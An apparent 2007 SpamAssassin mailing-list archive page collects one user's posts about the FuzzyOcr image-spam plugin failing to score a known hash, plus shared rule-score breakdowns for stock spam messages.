Could somebody please tell me where I'm going wrong.

It would be nice if images could be automatically stored in the hashdb
as spam if SA gives them a positive score, but FOCR does not.



I have the same problem as you, so you are not alone.  I first deleted the hash using fuzzy-find to make sure it didn't exist in either hash, then added it with a score of 10.  I re-ran spamassassin with debug on for FuzzyOcr and it did not see the entry in the spam db.  I even compared the hashes and they were the same:

% fuzzy-find --delete 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410
Img =278502 292x319x128

% fuzzy-find --learn-spam --score=10 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410
Img =278502 292x319x128

Rerun the spam through SA (China Fruits also: http://bubba.org/spam/)

Adding key to database...
[1548] dbg: FuzzyOcr: Not enough OCR Hits without space stripping, doing second matching pass...
[1548] info: FuzzyOcr: Message is ham, saving...
[1548] info: FuzzyOcr: Adding Hash to "/etc/mail/spamassassin/FuzzyOcr.safe.db" with score "0"
[1548] dbg: FuzzyOcr: Digest: 278502:292:319:128::203:248:219:231:26298::202:200:236:205:25148::247:249:185:241:16996::192:236:242:224:16482::136:34:15:62:630::108:30:158:68:410




FuzzyOcr image spam not getting scored

2007-02-23 Thread Brian Wilson


Passing this along in case someone has a scanset that is able to pick this one up.  Yes, it was tagged as spam from other rules, but I got nothing from FuzzyOcr on it.


http://bubba.org/spam/imagespam12.gif
http://bubba.org/spam/imagespam12.txt

-B


Re: Be bumblebee do shaft

2007-02-22 Thread Brian Wilson


On Feb 22, 2007, at 6:06 AM, Loren Wilton wrote:

Your best bets at the moment are FuzzyOCR and the SARE_STOCKS ruleset.  FuzzyOCR would have a real good chance of catching that image.  You didn't include the headers, so it is hard to say what is in there.  If you aren't running the net rules you should be.  The Botnet plugin might be another good choice.


Loren




I do not believe that was an image, more so HTML, so FuzzyOcr wouldn't help very much.  I agree that SARE_STOCKS, Botnet and eventually Bayes will be your best bets.


-B

Re: New stock spam (2/14/07)

2007-02-14 Thread Brian Wilson


On Feb 14, 2007, at 8:48 PM, Giampaolo Tomassoni wrote:


From: Quinn Comendant [mailto:[EMAIL PROTECTED]


On Thu, 15 Feb 2007 01:18:46 +0100, Giampaolo Tomassoni wrote:
I think SARE and some network tests are even better (scores 11.5 with my surprising Bayes :)


I agree, mine scored it in a similar way:

Content analysis details:   (11.5 points, 4.9 required)

 pts rule name              description
---- ---------------------- --------------------------------------------------
 0.0 DK_POLICY_SIGNSOME     Domain Keys: policy says domain signs some mails
 0.8 SARE_LWSHORTT          BODY: SARE_LWSHORTT
 1.7 SARE_PROLOSTOCK_SYM3   BODY: Last week's hot stock scam
 0.1 HTML_50_60             BODY: Message is 50% to 60% HTML
 0.0 HTML_MESSAGE           BODY: HTML included in message
 3.5 BAYES_99               BODY: Bayesian spam probability is 99 to 100%
                            [score: 1.]


Nah! You cheat! Bayes did already learn this message, right? :)

Giampaolo



Then we both cheated:

(no previous learns on this one that I'm aware of)

score=13.8 required=4.5
*  0.0 DK_POLICY_SIGNSOME Domain Keys: policy says domain signs some mails
*  2.0 BOTNET Relay might be a spambot or virusbot
*  [botnet0.7,ip=211.48.218.5,maildomain=amante.ro,nordns]
*  0.8 SARE_LWSHORTT BODY: SARE_LWSHORTT
*  1.7 SARE_PROLOSTOCK_SYM3 BODY: Last week's hot stock scam
*  0.1 HTML_50_60 BODY: Message is 50% to 60% HTML
*  0.0 HTML_MESSAGE BODY: HTML included in message
*  4.2 BAYES_99 BODY: Bayesian spam probability is 99 to 100%
*  [score: 1.]
*  2.0 RCVD_IN_BL_SPAMCOP_NET RBL: Received via a relay in bl.spamcop.net
*  [Blocked - see ]
*  3.0 RCVD_IN_XBL RBL: Received via a relay in Spamhaus XBL
*  [211.48.218.5 listed in zen.spamhaus.org]




